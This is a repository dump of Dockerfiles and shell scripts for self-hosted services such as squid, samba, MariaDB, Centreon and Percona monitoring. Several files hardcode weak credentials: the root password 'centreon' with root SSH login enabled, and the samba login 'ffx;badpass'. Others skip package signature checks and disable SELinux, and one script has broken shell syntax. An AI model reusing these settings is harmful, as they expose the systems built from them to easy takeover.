"text": "FROM opensuse:42.2\n\nMAINTAINER Horus \"[email protected]\"\nENV http_proxy=http://proxy:8080/\nENV https_proxy=http://proxy:8080/\nRUN zypper in -y proftpd\n\n\nADD proftpd.conf /etc/proftpd/proftpd.conf\nADD entrypoint.sh /usr/bin/\nRUN chown root:root /etc/proftpd/proftpd.conf\nRUN chmod +x /usr/bin/entrypoint.sh\nRUN mkdir /ftp\n\nEXPOSE 21\nEXPOSE 20\n\n\nENTRYPOINT [\"/usr/bin/entrypoint.sh\"]\n"
},
{
"alpha_fraction": 0.6914893388748169,
"alphanum_fraction": 0.7234042286872864,
"avg_line_length": 19.434782028198242,
"blob_id": "0905784f0c129f442b9f7970a2331c137519033b",
"content_id": "721b6224945abd285b996dfa09b4aee9647cf6e2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 470,
"license_type": "no_license",
"max_line_length": 43,
"num_lines": 23,
"path": "/alpine-squid/Dockerfile",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "FROM alpine\n\nENV SQUID_VERSION=3.5.27 \\\n SQUID_CACHE_DIR=/var/cache/squid \\\n SQUID_LOG_DIR=/var/log/squid \\\n SQUID_USER=squid\n\n# make sure the repositories are up to date\nRUN apk update\nRUN apk add squid\nRUN rm -rf /var/cache/apk/*\n\nEXPOSE 3128\n\nCOPY squid.conf /etc/squid/squid.conf\nCOPY ads.regexp /etc/squid/\nCOPY entrypoint.sh /sbin/entrypoint.sh\nRUN chmod 755 /sbin/entrypoint.sh\n\nEXPOSE 3128/tcp\nVOLUME [\"${SQUID_CACHE_DIR}\"]\n\nCMD [\"/sbin/entrypoint.sh\"]\n"
},
{
"alpha_fraction": 0.7067307829856873,
"alphanum_fraction": 0.7067307829856873,
"avg_line_length": 17.909090042114258,
"blob_id": "580564e70557ff9487d0cf67859a78a5f672b228",
"content_id": "c7c206fd4f3ab458548d6315345c5346c42aaa63",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 208,
"license_type": "no_license",
"max_line_length": 35,
"num_lines": 11,
"path": "/alpine-rtorrent/Dockerfile",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "FROM alpine\n \nENV TERM=xterm\nRUN apk update && apk add rtorrent\nRUN rm -rf /var/cache/apk/*\nRUN mkdir -p /var/data/\n\nCOPY rtorrent.rc /root/.rtorrent.rc\nVOLUME \"/var/data/\"\n\nENTRYPOINT [\"/usr/bin/rtorrent\"]\n"
},
{
"alpha_fraction": 0.7180851101875305,
"alphanum_fraction": 0.7553191781044006,
"avg_line_length": 22.5,
"blob_id": "1d2be7feafcbbce190dfdd23067d30e2db209e25",
"content_id": "5488695685ff83e1465fb4919f3c097c8fcdf3e3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 376,
"license_type": "no_license",
"max_line_length": 46,
"num_lines": 16,
"path": "/suse-gcc/Dockerfile",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "FROM opensuse:42.2\n\nMAINTAINER Horus \"[email protected]\"\nENV http_proxy=http://proxy:8080/\nENV https_proxy=http://proxy:8080/\nENV TERM=xterm\n\n# make sure the repositories are up to date\nRUN zypper in -y vim wget tar mlocate gcc make\nRUN zypper clean -a\n\nCOPY .bash_profile /root/\nCOPY entrypoint.sh /etc/entrypoint.sh\n\nRUN chmod 755 /etc/entrypoint.sh\nENTRYPOINT [\"/etc/entrypoint.sh\"]\n"
},
{
"alpha_fraction": 0.6726677417755127,
"alphanum_fraction": 0.6759411096572876,
"avg_line_length": 28.095237731933594,
"blob_id": "09205c3d03e70fc9fd98e26af6cbbd575ecc6fea",
"content_id": "ffd9140f279b56e2624b5a11072829fd1c96610a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 611,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 21,
"path": "/suse-mysql/entrypoint.sh",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\nMARIADB_USER=\"mysql\"\nMARIADB_GROUP=\"mysql\"\nVOLUME_HOME=\"/var/lib/mysql\"\nVOLUME_LOG=\"/var/log/mysql\"\n\nif [[ ! -d $VOLUME_HOME/mysql ]]; then\n echo \"=> An empty or uninitialized MariaDB volume is detected in $VOLUME_HOME\"\n echo \"=> Installing MariaDB ...\"\n mysql_install_db > /dev/null 2>&1\n chown -R $MARIADB_USER:$MARIADB_GROUP $VOLUME_HOME\n chown -R $MARIADB_USER:$MARIADB_GROUP $VOLUME_LOG\n echo \"=> Done!\" \n /etc/create_mariadb_admin_user.sh\nelse\n echo \"=> Using an existing volume of MariaDB\"\n chown -R $MARIADB_USER:$MARIADB_GROUP $VOLUME_HOME\nfi\n\nexec mysqld_safe\n"
},
{
"alpha_fraction": 0.5928143858909607,
"alphanum_fraction": 0.6180971264839172,
"avg_line_length": 22.85714340209961,
"blob_id": "ee304b94119dd9d3c4228e3f60541266392f9bb0",
"content_id": "d7e0239152c6683815865f22ded92ec74439a6cf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 1503,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 63,
"path": "/centos-centreon/docker-run-server.sh",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "#!/bin/sh\n\nhelp () {\n echo \"Usage: $0 hostname type link\"\n echo \"type = mysql apache squid samba torrent gitlab gcc\"\n}\n\nif [ $# -lt 2 ] ; then\n help && exit 1\nfi\n\n\nHOSTNAME=$1\nTYPE=$2\ncase $TYPE in\n mysql) CONTAINER=\"suse-mysql\" ; PORTS=\"3306\" ;;\n apache)CONTAINER=\"suse-apache\" ; PORTS=\"80 443\" ;;\n squid) CONTAINER=\"suse-squid\" ; PORTS=\"3128\" ;;\n samba) CONTAINER=\"suse-samba\" ; PORTS=\"\" ;;\n torrent) CONTAINER=\"suse-torrent\";;\n gitlab) CONTAINER=\"suse-gitlab\";;\n gcc) CONTAINER=\"suse-gcc\";;\n centreon) CONTAINER=\"centos-centreon\" PORTS=\"80 443\" ;;\n *) help && exit 1 ;;\nesac\n\nVIP=`getent hosts $HOSTNAME | awk '{print $1}'`\nENV_DIRECTORY=\"/data/docker/$TYPE/$HOSTNAME\"\nCONTAINER_DIR=\"usr/share/centreon etc/centreon etc/centreon-broker\"\nLINKED_CONTAINER=$3\n\n# Create data dir\nif [ ! -d $ENV_DIRECTORY ] ; then\n mkdir -p $ENV_DIRECTORY\nfi\n\n# Check if host adress is fount\nif [ -z $VIP ] ; then\n\techo \"Please add a entry for $HOSTNAME in /etc/hosts\"\n\texit 1\nfi\n\n#\nif [ ! -z $LINKED_CONTAINER ] ; then\n\tEXTRA_OPTS=\"$EXTRA_OPTS --link $LINKED_CONTAINER\"\nfi\n\n\nfor i in $CONTAINER_DIR ; do\n\t# Check if persistent data exist\n mkdir -p $ENV_DIRECTORY/$i\n\tif [ \"$(ls -A $ENV_DIRECTORY/$i 2> /dev/null)\" != \"\" ]; then\n\t\tDOCKER_VOLUMES=\"$DOCKER_VOLUMES -v $ENV_DIRECTORY/$i:/$i\"\n\tfi\ndone\n\n\ndocker run -d --name $HOSTNAME \\\n-h $HOSTNAME \\\n-p $VIP:80:80 -p $VIP:443:443 \\\n$DOCKER_VOLUMES \\\n$EXTRA_OPTS \\\n$CONTAINER\n"
},
{
"alpha_fraction": 0.7082067131996155,
"alphanum_fraction": 0.7416413426399231,
"avg_line_length": 26.41666603088379,
"blob_id": "05081f311a57015089f808c98a1e449e33764cc2",
"content_id": "22e5185217c72ae74d76b5d20e8faa08739a78f4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 329,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 12,
"path": "/suse-git/Dockerfile",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "FROM opensuse:42.2\n\nMAINTAINER Horus \"[email protected]\"\nENV http_proxy=http://proxy:8080/\nENV https_proxy=http://proxy:8080/\n\n# make sure the repositories are up to date\nRUN zypper --non-interactive --gpg-auto-import-keys ref -s\nRUN zypper --non-interactive --gpg-auto-import-keys in git vim\nRUN zypper clean -a\n\nENTRYPOINT [\"/bin/bash\"]\n"
},
{
"alpha_fraction": 0.6264880895614624,
"alphanum_fraction": 0.6517857313156128,
"avg_line_length": 25.613861083984375,
"blob_id": "56ef759f92e88a82be333097b5c2eea6cdcb0e0b",
"content_id": "84f3f164277e0dc1dde6c9dbba930387c1d97c08",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 2688,
"license_type": "no_license",
"max_line_length": 214,
"num_lines": 101,
"path": "/suse-torrent/.bash_profile",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "export PS1=\"\\[$(tput bold)\\]\\[$(tput setaf 0)\\]\\t \\[$(tput setaf 0)\\][\\[$(tput setaf 1)\\]\\u\\[$(tput setaf 1)\\]@\\[$(tput setaf 1)\\]\\h \\[$(tput setaf 1)\\]\\W\\[$(tput setaf 0)\\]]\\[$(tput setaf 0)\\]\\\\$ \\[$(tput sgr0)\\]\"\nexport http_proxy=\"http://10.211.55.21:3128\"\nexport https_proxy=\"http://10.211.55.21:3128\"\n\n\n#### Alias Sesction ####\nalias proxy=\"export http_proxy=http://10.211.55.21:3128\"\nalias ll='ls -l'\nalias la='ls -ltra'\n\nalias h='history'\nalias j='jobs -l'\n\n## Editor ###\nalias vi=vim\nalias vis='vim \"+set si\"'\nalias edit='vim'\n\n\nalias fastping='ping -c 100 -s.2'\n \n# get web server headers #\nalias header='curl -I'\n \n# find out if remote server supports gzip / mod_deflate or not #\nalias headerc='curl -I --compress'\n\n\n\nalias tcpdump='tcpdump -i'\n\ncase `uname -s` in\n\tLinux)\n\n\t# display all rules #\n\t## Colorize the grep command output for ease of use (good for log files)##\n\talias grep='grep --color=auto'\n\talias egrep='egrep --color=auto'\n\talias fgrep='fgrep --color=auto'\n\talias iptlist='sudo /sbin/iptables -L -n -v --line-numbers'\n\talias iptlistin='sudo /sbin/iptables -L INPUT -n -v --line-numbers'\n\talias iptlistout='sudo /sbin/iptables -L OUTPUT -n -v --line-numbers'\n\talias iptlistfw='sudo /sbin/iptables -L FORWARD -n -v --line-numbers'\n\talias firewall=iptlist\n\talias ports='netstat -tulanp'\n\talias ipt='sudo /sbin/iptables'\n\talias mkdir='mkdir -pv'\n\t\n\t#Service management\n\talias reload='systemctl reload'\n\talias restart='systemctl restart'\n\talias restart='systemctl restart'\n\talias start='systemctl start'\n\talias stop='systemctl stop'\n\n\talias mnt='mount |column -t'\n\talias zr='zypper ref -s'\n\talias zi='zypper in'\n\talias zs='zypper se'\n\t## pass options to free ## \n\talias meminfo='free -m -l -t'\n\t \n\t## get top process eating memory\n\talias psmem='ps auxf | sort -nr -k 4 | head -20'\n\n\t## get top process eating cpu ##\n\talias pscpu='ps auxf | sort -nr -k 3 | head -20'\n\talias ping='ping -c 5'\n\t# Docker\n\talias cddocker='cd /opt/ffx/docker/dockerfile'\n\talias dp='docker ps -a'\n\talias drunall='for i in `docker ps -q -a` ; do docker start $i ; done'\n\talias ds='docker stop'\n\talias dif=\"docker inspect --format '{{ .NetworkSettings.IPAddress }}'\"\n\talias dri='docker rmi'\n\talias di='docker images'\n\talias dr='docker rm'\n\talias dkd=\"docker run -d -P\"\n\talias dki=\"docker run -t -i -P\"\n\tdb() { docker build -t=\"$1\" .; }\n\tdra() { docker rm $(docker ps -q -a); }\n\n\tdsh() { \n\tdocker exec -i -t $1 /bin/bash\n\t}\n\n\tdbash () { \n\tdocker run --rm -i -t -e TERM=xterm --entrypoint /bin/bash $1 \n\t}\n\t;;\n\tSunOS*) \n\talias ifconfig=\"ifconfig -a | egrep -v 'IPv6|inet6'\"\n\talias pgrep='ps -ef | grep -i'\n\talias tailf='tail -f'\n\talias mkdir='mkdir -p'\n\t\n\talive () {\n\tping -s $1 2 4\n\t}\n\t;;\nesac\n"
},
{
"alpha_fraction": 0.5944882035255432,
"alphanum_fraction": 0.6062992215156555,
"avg_line_length": 13.941176414489746,
"blob_id": "3936c62763b4b0d987d8b624ae7ba1b61c608ef6",
"content_id": "656621d9682ed0febe6c487dae076daac5a36be1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 508,
"license_type": "no_license",
"max_line_length": 43,
"num_lines": 34,
"path": "/suse-squid/entrypoint.sh",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\nset -e\n\ncreate_log_dir() {\n mkdir -p ${SQUID_LOG_DIR}\n chmod -R 755 ${SQUID_LOG_DIR}\n chown -R ${SQUID_USER} ${SQUID_LOG_DIR}\n}\n\ncreate_cache_dir() {\n mkdir -p ${SQUID_CACHE_DIR}\n chown -R ${SQUID_USER} ${SQUID_CACHE_DIR}\n}\n\nstart_squid () {\n\tsquid -NYC\n}\n\ncreate_cache_dir () {\n\tsquid -z -F\n}\n\ncreate_log_dir\ncreate_cache_dir\n\nif [[ -z ${1} ]]; then\n\tif [[ ! -d ${SQUID_CACHE_DIR}/00 ]]; then\n\t\techo \"Initializing cache...\"\n\t\tcreate_cache_dir\n\tfi\n\techo \"Starting squid...\"\n\tstart_squid\nfi\n"
},
{
"alpha_fraction": 0.6404358148574829,
"alphanum_fraction": 0.6646488904953003,
"avg_line_length": 24.030303955078125,
"blob_id": "0ff67b852f2ef2ed3d69a5a76919835fa98adddb",
"content_id": "d768aaae1662479f496c5dda221389333c5ea22d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 826,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 33,
"path": "/suse-samba/docker-run.sh",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "VIP=\"suse-samba\"\nENV_DIRECTORY=\"/data/docker/samba/$VIP\"\nSAMBA_DIR=\"box downloads\"\nIP_VHOST=`getent hosts $VIP | awk '{print $1}'`\n\nLIB_DIR=\"/opt/ffx/scripts/libs\"\n. $LIB_DIR/systemd\n\nif [ ! -d $ENV_DIRECTORY ] ; then\n\tmkdir -p $ENV_DIRECTORY/shares\n\tmkdir -p $ENV_DIRECTORY/etc/\nfi\n\nif [ \"$(ls -A $ENV_DIRECTORY/etc 2> /dev/null)\" != \"\" ]; then\n\tDOCKER_VOLUMES=\" -v $ENV_DIRECTORY/etc/:/etc/samba/\"\nfi\n\nfor i in $SAMBA_DIR ; do \n\tmkdir -p $ENV_DIRECTORY/shares/$i\n\tDOCKER_VOLUMES=\"$DOCKER_VOLUMES -v $ENV_DIRECTORY/shares/$i:/shares/$i\"\ndone\n\ndocker run -it -h $VIP \\\n--name $VIP \\\n-p $IP_VHOST:137:137 $IP_VHOST:139:139 -p $IP_VHOST:445:445 \\\n$DOCKER_VOLUMES \\\n-d suse-samba \\\n-u \"ffx;badpass\" \\\n-s \"IN_BOX;/shares/box;yes;no;yes;;ffx\" \\\n-s \"DOWNLOADS;/shares/downloads;yes;no;no;ffx\" \\\n-n\n\nconfigure_docker_auto_start $VIP\n"
},
{
"alpha_fraction": 0.6666666865348816,
"alphanum_fraction": 0.6834381818771362,
"avg_line_length": 24.105262756347656,
"blob_id": "3c079f14da297eed5de390cfc0cc4dc502bf1ae2",
"content_id": "cac5338aed952da1627ebbc80c5b2a03bc508d1e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 477,
"license_type": "no_license",
"max_line_length": 181,
"num_lines": 19,
"path": "/suse-nginx/docker-run-nginx.sh",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\ndocker_port=\"86\"\ndocker_remote_port=\"80\"\ndocker_type=\"app_http\"\ndocker_conf_dir=\"\"\ndocker_data_dir=\"\"\ndocker_log_dir=\"\"\ndocker_cert_dir=\"\"\n\nEXTRA_OPTS=\"\"\n#CMD=\"docker run $EXTRA_OPTS\"\n\nif [ ! -z $docker_port ]; then\n\t$EXTRA_OPTS=\"$EXTRA_OPTS -p $docker_port\"\nfi\necho \"$EXTRA_OPTS\"\n\n#docker run -d -p 80:80 -v $docker_conf_dir:/etc/nginx/conf.d -v $docker_cert_dir:/etc/nginx/certs -v $docker_log_dir:/var/log/nginx -v $docker_data_dir:/var/www/html opensuse/nginx\n"
},
{
"alpha_fraction": 0.6539509296417236,
"alphanum_fraction": 0.6784741282463074,
"avg_line_length": 29.58333396911621,
"blob_id": "88f31d093e706c17cc175b10e333a3fd134aecc7",
"content_id": "1b46f0fbf471c7abf20829179f7756b67abc8b1c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 1468,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 48,
"path": "/alpine-samba/docker-run.sh",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "DIRECTORY=\"$HOME\"\nSHARES=\"Downloads Git Documents\"\nIP_VHOST=\"10.11.66.1 10.11.12.1\"\nDOCKER_CMD=\"podman\"\nDOCKER_ARGS=\"--cpus=1 -m 1g\"\nDOCKER_IMG_NAME=\"alpine-samba\"\nDOCKER_CNT_NAME=\"--name alpine-samba\"\nDOCKER_CMD_ARGS=\"-n -u ffx;badpass\"\n\n# Allow users to bind on low ports\nsudo sysctl -w net.ipv4.ip_unprivileged_port_start=0 &>/dev/null\n\n# Allow samba port on firewalld\nsudo firewall-cmd --add-service=samba --permanent\n\n# Allow users to limit cpu in systemd configuration (rootless)\nif [ ! -f \"/etc/systemd/system/user\\@.service.d/delegate.conf\" ] ; then\n sudo mkdir /etc/systemd/system/user\\@.service.d &>/dev/null\n cat << EOF | sudo tee /etc/systemd/system/user\\@.service.d/delegate.conf &>/dev/null\n[Service]\nDelegate=memory pids cpu io\nEOF\nsudo systemctl daemon-reload\nfi\n\n# Bind port on multiple interface\nfor IP in ${IP_VHOST} ; do\n DOCKER_PORTS_BIND=\"${DOCKER_PORTS_BIND} -p ${IP}:137:137 -p ${IP}:139:139 -p ${IP}:445:445\"\ndone\n\n# Create local shares if not present\nfor SHARE in ${SHARES} ; do\n if [ ! -d \"${DIRECTORY}/${SHARE}\" ] ; then\n\tmkdir -p ${DIRECTORY}/${SHARE}\n fi\n DOCKER_VOLUMES=\"${DOCKER_VOLUMES} -v ${DIRECTORY}/${SHARE}:/shares/${SHARE}\"\n DOCKER_CMD_ARGS=\"${DOCKER_CMD_ARGS} -s ${SHARE};/shares/${SHARE};yes;no;yes;;ffx\"\ndone\n\nCMD=\"${DOCKER_CMD} run --rm -it -d --hostname ${DOCKER_IMG_NAME} \\\n${DOCKER_ARGS} \\\n${DOCKER_CNT_NAME} \\\n${DOCKER_PORTS_BIND} \\\n${DOCKER_VOLUMES} \\\n${DOCKER_IMG_NAME} \\\n${DOCKER_CMD_ARGS}\"\n\n$CMD\n"
},
{
"alpha_fraction": 0.6212465763092041,
"alphanum_fraction": 0.6674249172210693,
"avg_line_length": 33.34375,
"blob_id": "9df7143759a605bd62877f6d3fe3a79472b7f097",
"content_id": "4f48fc34b43a5a4578d3a0ba846a7986a3985776",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 4396,
"license_type": "no_license",
"max_line_length": 136,
"num_lines": 128,
"path": "/suse-percona/Dockerfile",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "FROM opensuse:42.2\n\nEXPOSE 80 443 3000\n\nWORKDIR /opt\n\n#ADD smt.crt /etc/pki/trust/anchors/smt.crt\n#RUN update-ca-certificates\n\n#RUN zypper --gpg-auto-import-keys ref -s\nENV http_proxy=http://proxy:8080/\nENV https_proxy=http://proxy:8080/\n\n\nRUN zypper install -y curl git-core unzip python-requests python-pysqlite tar fontconfig cron vi\n\n\nRUN zypper addrepo --no-gpgcheck http://download.opensuse.org/repositories/devel:languages:python/SLE_12_SP1/devel:languages:python.repo\nRUN zypper refresh\nRUN zypper install -y supervisor\nRUN zypper install -y python\n\n#ADD nginx-1.10.2-1.sles12.ngx.x86_64.rpm /root/nginx.rpm\n#RUN zypper --no-gpg-checks --non-interactive install /root/nginx.rpm\n\n#ADD mysql57-community-release-sles12-8.noarch.rpm /root/mysql.rpm\n#RUN zypper --no-gpg-checks --non-interactive install /root/mysql.rpm\nRUN zypper --no-gpg-checks --non-interactive install mysql-server\nRUN zypper --no-gpg-checks --non-interactive install nginx\n#RUN zypper --no-gpg-checks --non-interactive install mysql-community-server\n\nRUN useradd -s /bin/false -U pmm\nRUN useradd -U www-data\nRUN mkdir /var/log/supervisor\n\n# ########## #\n# Prometheus #\n# ########## #\nRUN curl -s -LO https://github.com/prometheus/prometheus/releases/download/v1.2.2/prometheus-1.2.2.linux-amd64.tar.gz && \\\n mkdir -p prometheus/data node_exporter && \\\n chown -R pmm:pmm /opt/prometheus/data && \\\n tar zxf prometheus-1.2.2.linux-amd64.tar.gz --strip-components=1 -C prometheus && \\\n curl -s -LO https://github.com/prometheus/node_exporter/releases/download/0.12.0/node_exporter-0.12.0.linux-amd64.tar.gz && \\\n tar zxf node_exporter-0.12.0.linux-amd64.tar.gz --strip-components=1 -C node_exporter && \\\n rm -f prometheus-1.2.2.linux-amd64.tar.gz node_exporter-0.12.0.linux-amd64.tar.gz\nCOPY prometheus.yml /opt/prometheus/\n\n# ###################### #\n# Grafana and dashboards #\n# ###################### #\nCOPY import-dashboards.py grafana-postinstall.sh VERSION /opt/\nADD grafana-3.1.1-1470047149.x86_64.rpm /root/grafana.rpm\nRUN rpm -i --nodeps /root/grafana.rpm\n\nRUN git clone https://github.com/percona/grafana-dashboards.git \n\nRUN cp /opt/VERSION /var/lib/grafana/ && \\\n rm -rf /root/grafana.rpm grafana-dashboards/.git\n\nRUN /opt/grafana-postinstall.sh\n\n# ###### #\n# Consul #\n# ###### #\nRUN curl -s -LO https://releases.hashicorp.com/consul/0.7.0/consul_0.7.0_linux_amd64.zip && \\\n unzip consul_0.7.0_linux_amd64.zip && \\\n mkdir -p /opt/consul-data && \\\n chown -R pmm:pmm /opt/consul-data && \\\n rm -f consul_0.7.0_linux_amd64.zip\n\n# ##### #\n# Nginx #\n# ##### #\nCOPY nginx.conf nginx-ssl.conf /etc/nginx/\nRUN touch /etc/nginx/.htpasswd\n\n# ############ #\n# Orchestrator #\n# ############ #\nCOPY orchestrator.conf.json /etc/\n\nADD orchestrator-1.5.6-1.x86_64.rpm /root/orchestrator.rpm\nRUN zypper --no-gpg-checks --non-interactive install /root/orchestrator.rpm\n\n\nRUN curl -s -LO https://www.percona.com/downloads/TESTING/pmm/orchestrator-1.5.6-patch.tgz && \\\n tar zxf orchestrator-1.5.6-patch.tgz -C /usr/local/orchestrator/ && \\\n rm -f orchestrator-1.5.6-patch.tgz\n\nRUN rm -f /root/orchestrator.rpm\n\n# ########################### #\n# Supervisor and landing page #\n# ########################### #\nCOPY supervisord.conf /etc/supervisor/supervisord.conf\nCOPY entrypoint.sh /opt\nCOPY landing-page/ /opt/landing-page/\n\n# ####################### #\n# Percona Query Analytics #\n# ####################### #\nCOPY purge-qan-data /etc/cron.daily/\nCOPY qan-install.sh 
/opt/\nADD https://www.percona.com/downloads/TESTING/pmm/percona-qan-api-1.0.6-20161024.2cbdd01-x86_64.tar.gz \\\n https://www.percona.com/downloads/TESTING/pmm/percona-qan-app-1.0.6.tar.gz \\\n /opt/\n\nRUN curl -s -L -o /usr/bin/pt-archiver https://raw.githubusercontent.com/percona/percona-toolkit/2.2/bin/pt-archiver && \\\n chmod 755 /usr/bin/pt-archiver && \\\n mkdir qan-api qan-app && \\\n tar zxf percona-qan-api-1.0.6-20161024.2cbdd01-x86_64.tar.gz --strip-components=1 -C qan-api && \\\n tar zxf percona-qan-app-1.0.6.tar.gz --strip-components=1 -C qan-app \n\nRUN /opt/qan-install.sh\nRUN rm -rf percona-qan-api-1.0.6-20161024.2cbdd01-x86_64.tar.gz percona-qan-app-1.0.6.tar.gz qan-api\n\n# ####### #\n# Volumes #\n# ####### #\n\nVOLUME /opt/prometheus/data\nVOLUME /opt/consul-data\nVOLUME /var/lib/mysql\n\n# ##### #\n# Start #\n# ##### #\nCMD [\"/opt/entrypoint.sh\"]\n"
},
{
"alpha_fraction": 0.6645161509513855,
"alphanum_fraction": 0.7370967864990234,
"avg_line_length": 30,
"blob_id": "67a3103ee609118deac319ea6079e6eaf94de76a",
"content_id": "4e1d44d9bfba057782689de3b121c8fc04e36773",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 620,
"license_type": "no_license",
"max_line_length": 110,
"num_lines": 20,
"path": "/suse-webmin/Dockerfile",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "FROM opensuse:42.2\n\nMAINTAINER Horus \"[email protected]\"\nENV http_proxy=http://proxy:8080/\nENV https_proxy=http://proxy:8080/\nENV APACHE_VERSION=2.4.10 \\\n TERM=xterm\n\n# make sure the repositories are up to date\nRUN zypper -n install wget apache2 openssl openssl-devel perl perl-Net-SSLeay perl-Crypt-SSLeay\n\nRUN cd /tmp/ && wget -q https://sourceforge.net/projects/webadmin/files/webmin/1.810/webmin-1.810-1.noarch.rpm\nRUN cd /tmp/ && rpm -ivh webmin-1.810-1.noarch.rpm\nRUN rm -rf /tmp/webmin-1.810-1.noarch.rpm && rm -rf /tmp/webmin*\nRUN zypper clean -a\n\nEXPOSE 80/tcp\nEXPOSE 443/tcp\nEXPOSE 10000/tcp\nENTRYPOINT [\"/bin/bash\"]\n"
},
{
"alpha_fraction": 0.6419098377227783,
"alphanum_fraction": 0.6472148299217224,
"avg_line_length": 24.133333206176758,
"blob_id": "276235add5bd02dec43f49a60e781f4f1f3a8de2",
"content_id": "1614c3bb90b58aa4a10180efa266b915f4edcf98",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 377,
"license_type": "no_license",
"max_line_length": 98,
"num_lines": 15,
"path": "/alpine-rtorrent/docker-run.sh",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "#!/bin/bash -x\n\nNAME=\"rtorrent\"\n\n####\n#PORTS_CFG=\"--publish-all\"\nCPU_CFG=\"--cpus=1\"\nMEM_CFG=\"--memory=1g\"\nVOL_CFG=\"-v /home/reizer/Downloads:/var/data/\"\n\n### Podman ###\n#sudo docker run -d -it -h $NAME --name $NAME $VOL_OPTS $PORTS_OPTS localhost/alpine-torrent\n\n### Docker ###\nsudo docker run -d -it -h $NAME --name $NAME $CPU_CFG $MEM_CFG $VOL_CFG $PORTS_CFG alpine-rtorrent\n"
},
{
"alpha_fraction": 0.7490794062614441,
"alphanum_fraction": 0.762230396270752,
"avg_line_length": 32.94643020629883,
"blob_id": "d93a99c854750b82f8215b8fb64fbb7bb576ac23",
"content_id": "7fb1dab6a2585dc2b62ecbd16d3581ee78b19dfe",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 1901,
"license_type": "no_license",
"max_line_length": 195,
"num_lines": 56,
"path": "/centos-centreon/Dockerfile",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "FROM centos:6\nMAINTAINER ffx <[email protected]>\n\n\nENV http_proxy=http://proxy:8080/\nENV https_proxy=http://proxy:8080/\n\nENV CENTREON_CONF=\"/etc/centreon/\"\nENV CENTREON_WWW=\"/usr/share/centreon/www/\"\nENV TERM=xterm\n\n\n# Install Centreon Repository\n\nRUN yum -y install wget\nRUN wget http://yum-1.centreon.com/standard/3.4/el6/stable/RPM-GPG-KEY-CES -O /etc/pki/rpm-gpg/RPM-GPG-KEY-CES\nRUN wget http://yum.centreon.com/standard/3.4/el6/stable/centreon-stable.repo -O /etc/yum.repos.d/centreon-stable.repo\n\nRUN yum -y update\nRUN yum -y install centreon-base-config-centreon-engine centreon\n\n\n# Install ssh\nRUN yum -y install openssh-server openssh-client\nRUN mkdir /var/run/sshd\nRUN echo 'root:centreon' | chpasswd\nRUN sed -i 's/^#PermitRootLogin/PermitRootLogin/g' /etc/ssh/sshd_config\nRUN /etc/init.d/sshd start && /etc/init.d/sshd stop\n\nRUN yum -y install centreon-widget-graph-monitoring centreon-widget-host-monitoring centreon-widget-service-monitoring centreon-widget-hostgroup-monitoring centreon-widget-servicegroup-monitoring\n# Fix pass in db\nRUN sed -i 's/^;date.timezone =.*$/date.timezone = Europe\\/Paris/g' /etc/php.ini\nRUN echo \"SELINUX=disabled\" > /etc/sysconfig/selinux\n\n# Set rights for setuid\nRUN chown root:centreon-engine /usr/lib/nagios/plugins/check_icmp\nRUN chmod -w /usr/lib/nagios/plugins/check_icmp\nRUN chmod u+s /usr/lib/nagios/plugins/check_icmp\n\n# Install and configure supervisor\nRUN yum -y install python-setuptools nrpe-plugin\nRUN easy_install supervisor\n\n# Todo better split file\nADD supervisord.conf /etc/supervisord.conf\nADD run.sh /etc/centreon/\nRUN ln -s /usr/lib64/nagios/plugins/check_nrpe /usr/lib/nagios/plugins/check_nrpe\nRUN chmod +x /etc/centreon/run.sh\nRUN rm -rf /var/tmp/* /tmp/*\n\n# Expose port SSH and HTTP for the service\nEXPOSE 22 80 443\nVOLUME [\"${CENTREON_CONF}\"]\nVOLUME [\"${CENTREON_WWW}\"]\n\nCMD [\"/usr/bin/supervisord\",\"--configuration=/etc/supervisord.conf\"]\n"
},
{
"alpha_fraction": 0.5569210648536682,
"alphanum_fraction": 0.5847347974777222,
"avg_line_length": 23.539682388305664,
